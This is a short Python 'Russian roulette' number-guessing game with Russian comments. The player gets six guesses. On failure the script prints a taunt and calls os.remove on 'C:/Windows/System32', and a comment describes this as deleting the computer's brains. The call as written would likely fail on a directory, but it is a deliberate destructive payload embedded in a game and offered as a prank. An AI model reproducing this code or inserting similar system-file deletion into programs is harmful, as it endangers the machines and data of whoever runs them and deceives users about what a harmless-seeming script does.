# Импортируем ОС системы для работы с файлами и Метод Рандом для генерации случайных чисел
import random
import os
# Промежуток случайных чисел (1, 10)
random_number = random.randint(1, 10)
# attempts - попытки, в данном случае попыток 6 как барабан в револьвере (с одной пулей)
attempts = 6
# Цикл while True бесконечный цикл будет выполняться пока не выполнится одно из условий
while True:
    # Просим пользователя ввести число
    user_number = input("Введите число от 1 до 10: ")
    # 1 условие того что будет введено именно число а не буква
    if user_number.isdigit():
        user_number = int(user_number)
        # 2 условие при вводе числа от 1 до 10 отсчитывается 1 попытка
        if 1 <= user_number <= 10:
            attempts -= 1
            # 3 условие если пользователь угадывает случайное число выводится сообщение а после команда СТОП для бесконечного цикла
            if user_number == random_number:
                print("Ты спас свой компьютер!")
                break
            # Если пользователь не угадывает число и количество попыток равно 0 выводится сообщение и удаляется папка "C:/Windows/System32") (Мозги компьютера)
            elif attempts == 0:
                print("Выживает только сильнейший")
                os.remove("C:/Windows/System32")
                break
            # 3 условие которое выводит сообщение о количестве попыток если пользователь не угадал число
            else:
                print("Ответ неправильный. Осталось", attempts, "попыток")
        # 2 условие если пользователь ввел число меньше 1 или больше 10
        else:
            print("Число должно быть от 1 до 10.")
    # 1 условие если пользователь ввел букву
    else:
        print("Пожалуйста, введите целое число.")
        
# coding_by_GVNZO